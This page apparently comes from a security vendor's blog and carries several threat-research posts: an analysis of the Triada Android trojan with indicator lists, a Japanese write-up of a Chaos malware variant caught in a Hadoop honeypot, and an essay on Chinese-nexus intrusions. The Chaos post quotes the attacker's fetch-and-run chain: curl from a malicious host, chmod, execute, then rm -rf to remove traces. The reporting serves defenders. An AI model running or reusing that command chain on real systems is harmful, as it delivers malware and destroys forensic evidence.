ブログ
/
Network
/
October 14, 2024

How Triada Affects Banking and Communication Apps

Explore the intricacies of the Triada Trojan and its targeting of communication and banking apps. Learn how to safeguard against this threat.
Written by
Justin Torres
Cyber Analyst
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Justin Torres
Cyber Analyst
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
14
Oct 2024

The rise of android malware

Recently, there has been a significant increase in malware strains targeting mobile devices, with a growing number of Android-based malware families, such as banking trojans, which aim to steal sensitive banking information from organizations and individuals worldwide.

These malware families attempt to access users’ accounts to steal online banking credentials and cookies, bypass multi-factor authentication (MFA), and conduct automatic transactions to steal funds [1]. They often masquerade as legitimate software or communications from social media platforms to compromise devices. Once installed, they use tactics such as keylogging, dumping cached credentials, and searching the file system for stored passwords to steal credentials, take over accounts, and potentially perform identity theft [1].

One recent example is the Antidot Trojan, which infects devices by disguising itself as an update page for Google Play. It establishes a command-and-control (C2) channel with a server, allowing malicious actors to execute commands and collect sensitive data [2].

Despite these malware’s ability to evade detection by standard security software, for example, by changing their code [3], Darktrace recently detected another Android malware family, Triada, communicating with a C2 server and exfiltrating data.

Triada: Background and tactics

First surfacing in 2016, Triada is a modular mobile trojan known to target banking and financial applications, as well as popular communication applications like WhatsApp, Facebook, and Google Mail [4]. It has been deployed as a backdoor on devices such as CTV boxes, smartphones, and tablets during the supply chain process [5]. Triada can also be delivered via drive-by downloads, phishing campaigns, smaller trojans like Leech, Ztorg, and Gopro, or more recently, as a malicious module in applications such as unofficial versions of WhatsApp, YoWhatsApp, and FM WhatsApp [6] [7].

How does Triada work?

Once downloaded onto a user’s device, Triada collects information about the system, such as the device’s model, OS version, SD card space, and list of installed applications, and sends this information to a C2 server. The server then responds with a configuration file containing the device’s personal identification number and settings, including the list of modules to be installed.

After a device has been successfully infected by Triada, malicious actors can monitor and intercept incoming and outgoing texts (including two-factor authentication messages), steal login credentials and credit card information from financial applications, divert in-application purchases to themselves, create fake messaging and email accounts, install additional malicious applications, infect devices with ransomware, and take control of the camera and microphone [4] [7].

For devices infected by unofficial versions of WhatsApp, which are downloaded from third-party app stores [9] and from mobile applications such as Snaptube and Vidmate , Triada collects unique device identifiers, information, and keys required for legitimate WhatsApp to work and sends them to a remote server to register the device [7] [12]. The server then responds by sending a link to the Triada payload, which is downloaded and launched. This payload will also download additional malicious modules, sign into WhatsApp accounts on the target’s phone, and request the same permissions as the legitimate WhatsApp application, such as access to SMS messages. If granted, a malicious actor can sign the user up for paid subscriptions without their knowledge. Triada then collects information about the user’s device and mobile operator and sends it to the C2 server [9] [12].

How does Triada avoid detection?

Triada evades detection by modifying the Zygote process, which serves as a template for every application in the Android OS. This enables the malware to become part of every application launched on a device [3]. It also substitutes system functions and conceals modules from the list of running processes and installed apps, ensuring that the system does not raise the alarm [3]. Additionally, as Triada connects to a C2 server on the first boot, infected devices remain compromised even after a factory reset [4].

Triada attack overview

Across multiple customer deployments, devices were observed making a large number of connections to a range of hostnames, primarily over encrypted SSL and HTTPS protocols. These hostnames had never previously been observed on the customers’ networks and appear to be algorithmically generated. Examples include “68u91.66foh90o[.]com”, “92n7au[.]uhabq9[.]com”, “9yrh7.mea5ms[.]com”, and “is5jg.3zweuj[.]com”.

External Sites Summary Graph showing the rarity of the hostname “92n7au[.]uhabq9[.]com” on a customer network.
Figure 1: External Sites Summary Graph showing the rarity of the hostname “92n7au[.]uhabq9[.]com” on a customer network.

Most of the IP addresses associated with these hostnames belong to an ASN associated with the cloud provider Alibaba (i.e., AS45102 Alibaba US Technology Co., Ltd). These connections were made over a range of high number ports over 1000, most commonly over 30000 such as 32091, which Darktrace recognized as extremely unusual for the SSL and HTTPS protocols.

Screenshot of a Model Alert Event log showing a device connecting to the endpoint “is5jg[.]3zweuj[.]com” over port 32091.
Figure 2: Screenshot of a Model Alert Event log showing a device connecting to the endpoint “is5jg[.]3zweuj[.]com” over port 32091.

On several customer deployments, devices were seen exfiltrating data to hostnames which also appeared to be algorithmically generated. This occurred via HTTP POST requests containing unusual URI strings that were made without a prior GET request, indicating that the infected device was using a hardcoded list of C2 servers.

Screenshot of a Model Alert Event Log showing the device posting the string “i8xps1” to the hostname “72zf6.rxqfd[.]com.
Figure 3: Screenshot of a Model Alert Event Log showing the device posting the string “i8xps1” to the hostname “72zf6.rxqfd[.]com.
Screenshot of a Model Alert Event Log showing the device posting the string “sqyjyadwwq” to the hostname “9yrh7.mea5ms[.]com”.
Figure 4: Screenshot of a Model Alert Event Log showing the device posting the string “sqyjyadwwq” to the hostname “9yrh7.mea5ms[.]com”.

These connections correspond with reports that devices affected by Triada communicate with the C2 server to transmit their information and receive instructions for installing the payload.

A number of these endpoints have communicating files associated with the unofficial WhatsApp versions YoWhatsApp and FM WhatsApp [11] [12] [13] . This could indicate that the devices connecting to these endpoints were infected via malicious modules in the unofficial versions of WhatsApp, as reported by open-source intelligence (OSINT) [10] [12]. It could also mean that the infected devices are using these connections to download additional files from the C2 server, which could infect systems with additional malicious modules related to Triada.

Moreover, on certain customer deployments, shortly before or after connecting to algorithmically generated hostnames with communicating files linked to YoWhatsApp and FM WhatsApp, devices were also seen connecting to multiple endpoints associated with WhatsApp and Facebook.

Screenshot from a device’s event log showing connections to endpoints associated with WhatsApp shortly after it connected to “9yrh7.mea5ms[.]com”.
Figure 5: Screenshot from a device’s event log showing connections to endpoints associated with WhatsApp shortly after it connected to “9yrh7.mea5ms[.]com”.

These surrounding connections indicate that Triada is attempting to sign in to the users’ WhatsApp accounts on their mobile devices to request permissions such as access to text messages. Additionally, Triada sends information about users’ devices and mobile operators to the C2 server.

The connections made to the algorithmically generated hostnames over SSL and HTTPS protocols, along with the HTTP POST requests, triggered multiple Darktrace models to alert. These models include those that detect connections to potentially algorithmically generated hostnames, connections over ports that are highly unusual for the protocol used, unusual connectivity over the SSL protocol, and HTTP POSTs to endpoints that Darktrace has determined to be rare for the network.

Conclusion

Recently, the use of Android-based malware families, aimed at stealing banking and login credentials, has become a popular trend among threat actors. They use this information to perform identity theft and steal funds from victims worldwide.

Across affected customers, multiple devices were observed connecting to a range of likely algorithmically generated hostnames over SSL and HTTPS protocols. These devices were also seen sending data out of the network to various hostnames via HTTP POST requests without first making a GET request. The URIs in these requests appeared to be algorithmically generated, suggesting the exfiltration of sensitive network data to multiple Triada C2 servers.

This activity highlights the sophisticated methods used by malware like Triada to evade detection and exfiltrate data. It underscores the importance of advanced security measures and anomaly-based detection systems to identify and mitigate such mobile threats, protecting sensitive information and maintaining network integrity.

Credit to: Justin Torres (Senior Cyber Security Analyst) and Charlotte Thompson (Cyber Security Analyst).

Appendices

Darktrace Model Detections

Model Alert Coverage

Anomalous Connection / Application Protocol on Uncommon Port

Anomalous Connection / Multiple Connections to New External TCP Port

Anomalous Connection / Multiple HTTP POSTS to Rare Hostname

Anomalous Connections / Multiple Failed Connections to Rare Endpoint

Anomalous Connection / Suspicious Expired SSL

Compromise / DGA Beacon

Compromise / Domain Fluxing

Compromise / Fast Beaconing to DGA

Compromise / Sustained SSL or HTTP Increase

Compromise / Unusual Connections to Rare Lets Encrypt

Unusual Activity / Unusual External Activity

AI Analyst Incident Coverage

Unusual Repeated Connections to Multiple Endpoints

Possible SSL Command and Control

Unusual Repeated Connections

List of Indicators of Compromise (IoCs)

Ioc – Type - Description

  • is5jg[.]3zweuj[.]com - Hostname - Triada C2 Endpoint
  • 68u91[.]66foh90o[.]com - Hostname - Triada C2 Endpoint
  • 9yrh7[.]mea5ms[.]com - Hostname - Triada C2 Endpoint
  • 92n7au[.]uhabq9[.]com - Hostname - Triada C2 Endpoint
  • 4a5x2[.]fs4ah[.]com - Hostname - Triada C2 Endpoint
  • jmll4[.]66foh90o[.]com - Hostname - Triada C2 Endpoint
  • mrswd[.]wo87sf[.]com - Hostname - Triada C2 Endpoint
  • lptkw[.]s4xx6[.]com - Hostname - Triada C2 Endpoint
  • ya27fw[.]k6zix6[.]com - Hostname - Triada C2 Endpoint
  • w0g25[.]66foh90o[.]com - Hostname - Triada C2 Endpoint
  • kivr8[.]wd6vy[.]com - Hostname - Triada C2 Endpoint
  • iuwe64[.]ct8pc6[.]com - Hostname - Triada C2 Endpoint
  • qefgn[.]8z0le[.]com - Hostname - Triada C2 Endpoint
  • a6y0x[.]xu0h7[.]com - Hostname - Triada C2 Endpoint
  • wewjyw[.]qb6ges[.]com - Hostname - Triada C2 Endpoint
  • vx9dle[.]n0qq3z[.]com - Hostname - Triada C2 Endpoint
  • 72zf6[.]rxqfd[.]com - Hostname - Triada C2 Endpoint
  • dwq[.]fsdw4f[.]com - Hostname - Triada C2 Endpoint
  • tqq6g[.]66foh90o[.]com - Hostname - Triada C2 Endpoint
  • 1rma1[.]4f8uq[.]com - Hostname - Triada C2 Endpoint
  • 0fdwa[.]7j3gj[.]com - Hostname - Triada C2 Endpoint
  • 5a7en[.]1e42t[.]com - Hostname - Triada C2 Endpoint
  • gmcp4[.]1e42t[.]com - Hostname - Triada C2 Endpoint
  • g7190[.]rt14v[.]com - Hostname - Triada C2 Endpoint
  • goyvi[.]2l2wa[.]com - Hostname - Triada C2 Endpoint
  • zq6kk[.]ca0qf[.]com - Hostname - Triada C2 Endpoint
  • sv83k[.]bn3avv[.]com - Hostname - Triada C2 Endpoint
  • 9sae7h[.]ct8pc6[.]com - Hostname - Triada C2 Endpoint
  • jpygmk[.]qt7tqr[.]com - Hostname - Triada C2 Endpoint
  • av2wg[.]rt14v[.]com - Hostname - Triada C2 Endpoint
  • ugbrg[.]osz1p[.]com - Hostname - Triada C2 Endpoint
  • hw2dm[.]wtws9k[.]com - Hostname - Triada C2 Endpoint
  • kj9atb[.]hai8j1[.]com - Hostname - Triada C2 Endpoint
  • pls9b[.]b0vb3[.]com - Hostname - Triada C2 Endpoint
  • 8rweau[.]j7e7r[.]com - Hostname - Triada C2 Endpoint
  • wkc5kn[.]j7e7r[.]com - Hostname - Triada C2 Endpoint
  • v58pq[.]mpvflv[.]com - Hostname - Triada C2 Endpoint
  • zmai4k[.]huqp3e[.]com - Hostname - Triada C2 Endpoint
  • eajgum[.]huqp3e[.]com - Hostname - Triada C2 Endpoint
  • mxl9zg[.]kv0pzv[.]com - Hostname - Triada C2 Endpoint
  • ad1x7[.]mea5ms[.]com - Hostname - Triada C2 Endpoint
  • ixhtb[.]s9gxw8[.]com - Hostname - Triada C2 Endpoint
  • vg1ne[.]uhabq9[.]com - Hostname - Triada C2 Endpoint
  • q5gd0[.]birxpk[.]com - Hostname - Triada C2 Endpoint
  • dycsw[.]h99n6[.]com - Hostname - Triada C2 Endpoint
  • a3miu[.]h99n6[.]com - Hostname - Triada C2 Endpoint
  • qru62[.]5qwu8b5[.]com - Hostname - Triada C2 Endpoint
  • 3eox8[.]abxkoop[.]com - Hostname - Triada C2 Endpoint
  • 0kttj[.]bddld[.]com - Hostname - Triada C2 Endpoint
  • gjhdr[.]xikuj[.]com - Hostname - Triada C2 Endpoint
  • zq6kk[.]wm0hd[.]com - Hostname - Triada C2 Endpoint
  • 8.222.219[.]234 - IP Address - Triada C2 Endpoint
  • 8.222.244[.]205 - IP Address - Triada C2 Endpoint
  • 8.222.243[.]182 - IP Address - Triada C2 Endpoint
  • 8.222.240[.]127 - IP Address - Triada C2 Endpoint
  • 8.219.123[.]139 - IP Address - Triada C2 Endpoint
  • 8.219.196[.]124 - IP Address - Triada C2 Endpoint
  • 8.222.217[.]73 - IP Address - Triada C2 Endpoint
  • 8.222.251[.]253 - IP Address - Triada C2 Endpoint
  • 8.222.194[.]254 - IP Address - Triada C2 Endpoint
  • 8.222.251[.]34 - IP Address - Triada C2 Endpoint
  • 8.222.216[.]105 - IP Address - Triada C2 Endpoint
  • 47.245.83[.]167 - IP Address - Triada C2 Endpoint
  • 198.200.54[.]56 - IP Address - Triada C2 Endpoint
  • 47.236.113[.]126 - IP Address - Triada C2 Endpoint
  • 47.241.47[.]128 - IP Address - Triada C2 Endpoint
  • /iyuljwdhxk - URI - Triada C2 URI
  • /gvuhlbzknh - URI - Triada C2 URI
  • /sqyjyadwwq - URI - Triada C2 URI
  • /cncyz3 - URI - Triada C2 URI
  • /42k0zk - URI - Triada C2 URI
  • /75kdl5 - URI - Triada C2 URI
  • /i8xps1 - URI - Triada C2 URI
  • /84gcjmo - URI - Triada C2 URI
  • /fkhiwf - URI - Triada C2 URI

MITRE ATT&CK Mapping

Technique Name - Tactic - ID - Sub-Technique of

Data Obfuscation - COMMAND AND CONTROL - T1001

Non-Standard Port - COMMAND AND CONTROL - T1571

Standard Application Layer Protocol - COMMAND AND CONTROL ICS - T0869

Non-Application Layer Protocol - COMMAND AND CONTROL - T1095

Masquerading - EVASION ICS - T0849

Man in the Browser - COLLECTION - T1185

Web Protocols - COMMAND AND CONTROL - T1071.001 -T1071

External Proxy - COMMAND AND CONTROL - T1090.002 - T1090

Domain Generation Algorithms - COMMAND AND CONTROL - T1568.002 - T1568

Web Services - RESOURCE DEVELOPMENT - T1583.006 - T1583

DNS - COMMAND AND CONTROL - T1071.004 - T1071

Fast Flux DNS - COMMAND AND CONTROL - T1568.001 - T1568

One-Way Communication - COMMAND AND CONTROL - T1102.003 - T1102

Digital Certificates - RESOURCE DEVELOPMENT - T1587.003 - T1587

References

[1] https://www.checkpoint.com/cyber-hub/cyber-security/what-is-trojan/what-is-a-banking-trojan/

[2] https://cyberfraudcentre.com/the-rise-of-the-antidot-android-banking-trojan-a-comprehensive-guide

[3] https://www.zimperium.com/glossary/banking-trojans/

[4] https://www.geeksforgeeks.org/what-is-triada-malware/

[5] https://www.infosecurity-magazine.com/news/malware-infected-devices-retailers/

[6] https://www.pcrisk.com/removal-guides/24926-triada-trojan-android

[7] https://securelist.com/malicious-whatsapp-mod-distributed-through-legitimate-apps/107690/

[8] https://securityboulevard.com/2024/02/impact-of-badbox-and-peachpit-malware-on-android-devices/

[9] https://threatpost.com/custom-whatsapp-build-malware/168892/

[10] https://securelist.com/triada-trojan-in-whatsapp-mod/103679/

[11] https://www.virustotal.com/gui/domain/is5jg.3zweuj.com/relations

[12] https://www.virustotal.com/gui/domain/92n7au.uhabq9.com/relations

[13] https://www.virustotal.com/gui/domain/68u91.66foh90o.com/relations

執筆者
Justin Torres
Cyber Analyst
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Justin Torres
Cyber Analyst

ダークトレースは新しいChaosマルウェア亜種によるクラウドの設定ミスのエクスプロイトを発見

April 7, 2026
Nathaniel Bill
Malware Research Engineer
Watch the NIS2 Webinar
よく読まれているブログ
1
ダークトレース、2026年度Gartner® CPS Protection Platforms部門のMagic Quadrant™ において唯一のVisionaryの評価を受ける
Mar 20, 2026
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
さらに読む
Network
April 2, 2026

How Chinese-Nexus Cyber Operations Have Evolved – And What It Means For Cyber Risk and Resilience 

Darktrace's latest threat research reveals how Chinese-nexus cyber operations have evolved from isolated intrusions into long-term strategic positioning, with attackers prioritizing persistent access to critical infrastructure and digital ecosystems to gain lasting operational and economic advantage.
Nathaniel Jones
VP, Security & AI Strategy, Field CISO
Read more
Network
March 26, 2026

Phantom Footprints: Tracking GhostSocks Malware

GhostSocks is an emerging threat turning compromised devices into residential proxy nodes to help attackers evade detection. Darktrace identifies its growing use alongside Lumma Stealer, highlighting the malware’s stealth, payload delivery, and persistence. AI-driven detection and Autonomous Response reveal the full attack lifecycle and underscore the need for proactive defense.
Isabel Evans
Cyber Analyst
Read more
Network
March 17, 2026

When Reality Diverges from the Playbook: Darktrace Identifies Encryption in a World Leaks Ransomware Attack

World Leaks, a rebrand of Hunters International, are known for their extortion-only attack model, abandoning the tactic of file encryption. However, contrary to these claims, Darktrace detected a World Leaks compromise where a ransomware payload was deployed, and customer data was encrypted.
Tiana Kelly
Senior Cyber Analyst & Team Lead
Read more

Blog

/

/

April 7, 2026

ダークトレースは新しいChaosマルウェア亜種によるクラウドの設定ミスのエクスプロイトを発見

Default blog imageDefault blog image

はじめに

敵対者の行動をリアルタイムに観測するため、ダークトレースは“CloudyPots”と呼ばれるグローバルなハニーポットネットワークを運用しています。CloudyPotsは幅広いサービス、プロトコル、クラウドプラットフォームに渡って悪意あるアクティビティを捕捉するように設計されています。こうしたハニーポットはインターネットに接続されているインフラを狙う脅威のテクニック、ツール、マルウェアについて貴重な情報を提供してくれます。

ダークトレースのハニーポット内で標的とされたソフトウェアの一例は、Apacheが開発したオープンソースフレームワークであり、コンピュータクラスタで大規模なデータセットの分散処理を可能にするHadoopです。ダークトレースのハニーポット環境では、攻撃者がサービス上でリモートコードを実行できるよう、Hadoopインスタンスが意図的に誤設定されています。2026年3月に観測されたサンプルにより、ダークトレースはChaosマルウェアに関連する活動を特定し、詳しく調査することができました。

Chaosマルウェアとは?

Lumen社のBlack Lotus Labsで最初に発見されたChaosは、Goベースのマルウェアです[1]。サンプル内の文字列に中国語の文字が含まれていることや、zh-CNロケールのインジケーターが存在することから、中国起源であると推測されています。コードの重複があることから、ChaosはKaijiボットネットの進化形である可能性が高いと見られます。

Chaosはこれまでルーターを標的としており、主にSSHブルートフォース攻撃やルーターソフトウェアの既知のCVE(共通脆弱性識別子)を通じて拡散します。その後感染したデバイスをDDoS(分散型サービス拒否攻撃)ボットネットや、暗号通貨マイニングに使用します。  

Chaosマルウェア侵害についてのダークトレースの視点

攻撃は脅威アクターがHadoop環境上のエンドポイントに対して新しいアプリケーションを作成するリクエストを送信したことから始まりました。

The initial infection being delivered to the unsecured endpoint.
図1:保護されていないエンドポイントへの最初の感染

これは新しいアプリケーションを定義するもので、最初のコマンドをコンテナ内で実行することがam-container-specセクションのコマンドフィールドで指定されています。これによりいくつかのシェルコマンドが起動されます:

  • curl -L -O http://pan.tenire[.]com/down.php/7c49006c2e417f20c732409ead2d6cc0. - ファイルを攻撃者のサーバーからダウンロードします。この例ではChaosエージェントマルウェア実行形式です。
  • chmod 777 7c49006c2e417f20c732409ead2d6cc0. - すべてのユーザーが読み取り、書き込み、マルウェアを実行できる権限を設定します。
  • ./7c49006c2e417f20c732409ead2d6cc0. - マルウェアを実行します。
  • rm -rf 7c49006c2e417f20c732409ead2d6cc0. - 活動の痕跡を消すためにマルウェアファイルをディスクから削除します。

実際には、このアプリケーションが作成されると、攻撃者が定義したバイナリが攻撃者のサーバーからダウンロードされ、システム上で実行され、その後、フォレンジックデータ収集を防ぐために削除されます。ドメイン pan.tenire[.]com は以前、“Operation Silk Lure”と呼ばれる別のキャンペーンで観測されています。これは悪意のある求人応募履歴書を通じて ValleyRATというリモートアクセス型トロイの木馬(RAT)を配布していました。Chaosと同様に、このキャンペーンでは、偽の履歴書自体を含め、攻撃ステージ全体にわたって大量の漢字が使用されていました。このドメインは107[.]189.10.219に解決されます。これは低コストのVPSサービスを提供することで知られるプロバイダー、BuyVMのルクセンブルク拠点でホストされている仮想プライベートサーバー(VPS)です。

アップデートされたChaosマルウェアサンプルの分析

Chaosはこれまでルーターやその他のエッジデバイスを標的としており、Linuxサーバー環境の侵害は比較的新しい方向性です。ダークトレースがこの侵害で観測したサンプルは64ビットのELFバイナリですが、ルーターのハードウェアの大部分は通常ARM、MIPS、またはPowerPCアーキテクチャで動作し、多くは32ビットです。

この攻撃に使用されたマルウェアのサンプルは、以前のバージョンと比べて著しい再構築が行われています。デフォルトの名前空間は“main_chaos”から単に“main”に変更され、またいくつかの関数が再設計されています。これらの変更が行われていますが、systemdを介して確立される永続化メカニズムや、悪意のあるキープアライブスクリプトが/boot/system.pubに保存されるなど、中心的な特徴は維持されています。

The creation of the systemd persistence service.
図2:systemd 永続化サービスの作成

同様に、DDoS攻撃を実行する関数もこれまで通り存在し、以下のプロトコルを標的とするメソッドが含まれています:

  • HTTP
  • TLS
  • TCP
  • UDP
  • WebSocket

ただし、SSHスプレッダーや脆弱性エクスプロイトなどのいくつかの機能は削除されたようです。さらに、以前はKaijiから継承されたと考えられていたいくつかの機能も変更されており、脅威アクターがマルウェアを書き直したか、大幅にリファクタリングしたことを示唆しています。

このマルウェアの新しい機能はSOCKSプロキシです。マルウェアがコマンド&コントロール(C2)サーバーからStartProxyコマンドを受信すると、攻撃者が制御するTCPポートで待ち受けを開始し、SOCKS5プロキシとして動作します。これにより、攻撃者は侵害されたサーバーを経由してトラフィックをルーティングし、それをプロキシとして使用することが可能になります。この機能にはいくつかの利点があります。被害者のインターネット接続から攻撃を開始できるため、活動が攻撃者ではなく被害者から発生しているように見せかけられること、また侵害されたサーバーからのみアクセス可能な内部ネットワークに移動できる点です。

The command processor for StartProxy. Due to endianness, the string is reversed.
図3:StartProxyのコマンドプロセッサ。エンディアン性のため文字列が反転しています

以前、他のDDoSボットネット、たとえばAisuruなどでは、他のサイバー犯罪者にプロキシサービスを提供するためにピボットしているケースがありました。Chaosの開発者はこの傾向に注目し、同様の機能を追加することで収益化のオプションを拡大、自らのボットネットの機能を強化することにより、他の競合するマルウェア運営者から遅れをとらないようにしたものと思われます。

サンプルには埋め込みドメイン、gmserver.osfc[.]org[.]cnが含まれており、C2サーバーのIPを解決するために使用されていました。本稿執筆の時点ではドメインは70[.]39.181.70に解決され、これは地理位置情報が香港にあるNetLabelGlobalが所有するIPです。

過去には、このドメインは154[.]26.209.250にも解決されており、これは専用サーバーレンタルを提供する低コストVPSプロバイダー、Kurun Cloudが所有していました。マルウェアはコマンドの送信および受信にポート65111を使用しますが、どちらのIPも本稿執筆時点ではこのポート上で接続を受け入れている様子はありませんでした。

主なポイント

Chaosは新しいマルウェアではなく、その継続的進化はサイバー犯罪者がボットネットをさらに拡大し機能を強化しようと努力を重ねていることの現れです。過去に報告されているChaosマルウェアにも、すでに幅広いルーターCVEのエクスプロイト機能が含まれていました。そして最近のLinuxクラウドサーバー脆弱性を狙った進化により、このマルウェアの影響範囲はさらに広がります。

したがって、セキュリティチームがCVEへのパッチを行い、クラウド上で展開されているアプリケーションに対して強固なセキュリティ設定を行うことが重要となります。クラウド市場が成長を続ける一方で、使用できるセキュリティツールが追い付かない状況においてこのことは特に重要な意味を持ちます。

AisuruやChaos等のボットネットがプロキシサービスをコア機能に取り入れる最近の変化は、ボットネットが組織とセキュリティチームにもたらすリスクはもはやDoS攻撃だけではないことを意味します。プロキシにより攻撃者はレート制限を回避し痕跡を隠すことができ、より複雑な形のサイバー犯罪が可能になると同時に、防御者にとっては悪意あるキャンペーンを検知しブロックすることが格段に難しくなります。

担当: Nathaniel Bill (Malware Research Engineer)
編集: Ryan Traill (Content Manager)

侵害インジケーター (IoCs)

ae457fc5e07195509f074fe45a6521e7fd9e4cd3cd43e42d10b0222b34f2de7a - Chaos マルウェアハッシュ

182[.]90.229.95 - 攻撃者 IP

pan.tenire[.]com (107[.]189.10.219) - 悪意あるバイナリをホストしているサーバー

gmserver.osfc[.]org[.]cn (70[.]39.181.70, 154[.]26.209.250) - 攻撃者 C2 サーバー

参考資料

[1] - https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

Network

/

April 2, 2026

How Chinese-Nexus Cyber Operations Have Evolved – And What It Means For Cyber Risk and Resilience 

Default blog imageDefault blog image

Cybersecurity has traditionally organized risk around incidents, breaches, campaigns, and threat groups. Those elements still matter—but if we fixate on individual incidents, we risk missing the shaping of the entire ecosystem. Nation‑state–aligned operators are increasingly using cyber operations to establish long-term strategic leverage, not just to execute isolated attacks or short‑term objectives.  

Our latest research, Crimson Echo, shifts the lens accordingly. Instead of dissecting campaigns, malware families, or actor labels as discrete events, the threat research team analyzed Chinese‑nexus activity as a continuum of behaviors over time. That broader view reveals how these operators position themselves within environments: quietly, patiently, and persistently—often preparing the ground long before any recognizable “incident” occurs.  

How Chinese-nexus cyber threats have changed over time

Chinese-nexus cyber activity has evolved in four phases over the past two decades. This ranges from early, high-volume operations in the 1990s and early 2000s to more structured, strategically-aligned activity in the 2010s, and now toward highly adaptive, identity-centric intrusions.  

Today’s phase is defined by scale, operational restraint, and persistence. Attackers are establishing access, evaluating its strategic value, and maintaining it over time. This reflects a broader shift: cyber operations are increasingly integrated into long-term economic and geopolitical strategies. Access to digital environments, specifically those tied to critical national infrastructure, supply chains, and advanced technology, has become a form of strategic leverage for the long-term.  

How Darktrace analysts took a behavioral approach to a complex problem

One of the challenges in analyzing nation-state cyber activity is attribution. Traditional approaches often rely on tracking specific threat groups, malware families, or infrastructure. But these change constantly, and in the case of Chinese-nexus operations, they often overlap.

Crimson Echo is the result of a retrospective analysis of three years of anomalous activity observed across the Darktrace fleet between July 2022 and September 2025. Using behavioral detection, threat hunting, open-source intelligence, and a structured attribution framework (the Darktrace Cybersecurity Attribution Framework), the team identified dozens of medium- to high-confidence cases and analyzed them for recurring operational patterns.  

This long-horizon, behavior-centric approach allows Darktrace to identify consistent patterns in how intrusions unfold, reinforcing that behavioral patterns that matter.  

What the data shows

Several clear trends emerged from the analysis:

  • Targeting is concentrated in strategically important sectors. Across the dataset, 88% of intrusions occurred in organizations classified as critical infrastructure, including transportation, critical manufacturing, telecommunications, government, healthcare, and Information Technology (IT) services.  
  • Strategically important Western economies are a primary focus. The US alone accounted for 22.5% of observed cases, and when combined with major European economies including Germany, Italy, Spain and the UK, over half of all intrusions (55%) were concentrated in these regions.  
  • Nearly 63% of intrusions of intrusions began with the exploitation of internet-facing systems, reinforcing the continued risk posed by externally exposed infrastructure.  

Two models of cyber operations

Across the dataset, Chinese-nexus activity followed two operational models.  

The first is best described as “smash and grab.” These are short-horizon intrusions optimized for speed. Attackers move quickly – often exfiltrating data within 48 hours – and prioritize scale over stealth. The median duration of these compromises is around 10 days. It’s clear they are willing to risk detection for short-term gain.  

The second is “low and slow.” These operations were less prevalent in the dataset, but potentially more consequential. Here, attackers prioritize persistence, establishing durable access through identity systems and legitimate administrative tools, so they can maintain access undetected for months or even years. In one notable case, the actor had fully compromised the environment and established persistence, only to resurface in the environment more than 600 days after. The operational pause underscores both the depth of the intrusion and the actor’s long‑term strategic intent. This suggests that cyber access is a strategic asset to preserve and leverage over time, and we observed these attacks most often inin sectors of the high strategic importance.  

It’s important to note that the same operational ecosystem can employ both models concurrently, selecting the appropriate model based on target value, urgency, intended access. The observation of a “smash and grab” model should not be solely interpreted as a failure of tradecraft, but instead an operational choice likely aligned with objectives. Where “low and slow” operations are optimized for patience, smash and grab is optimized for speed; both seemingly are deliberate operational choices, not necessarily indicators of capability.  

Rethinking cyber risk

For many organizations, cyber risk is still framed as a series of discrete events. Something happens, it is detected and contained, and the organization moves on. But persistent access, particularly in deeply interconnected environments that span cloud, identity-based SaaS and agentic systems, and complex supply chain networks, creates a major ongoing exposure risk. Even in the absence of disruption or data theft, that access can provide insight into operations, dependencies, and strategic decision-making. Cyber risk increasingly resembles long-term competitive intelligence.  

This has impact beyond the Security Operations Center. Organizations need to shift how they think about governance, visibility, and resilience, and treat cyber exposure as a structural business risk instead of an incident response challenge.  

What comes next

The goal of this research is to provide a clearer understanding of how these operations work, so defenders can recognize them earlier and respond more effectively. That includes shifting from tracking indicators to understanding behaviors, treating identity providers as critical infrastructure risks, expanding supplier oversight, investing in rapid containment capabilities, and more.  

Learn more about the findings of Darktrace’s latest research, Crimson Echo: Understanding Chinese-nexus Cyber Operations Through Behavioral Analysis, by downloading the full report and summaries for business leaders, CISOs, and SOC analysts here.  

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO
あなたのデータ × DarktraceのAI
唯一無二のDarktrace AIで、ネットワークセキュリティを次の次元へ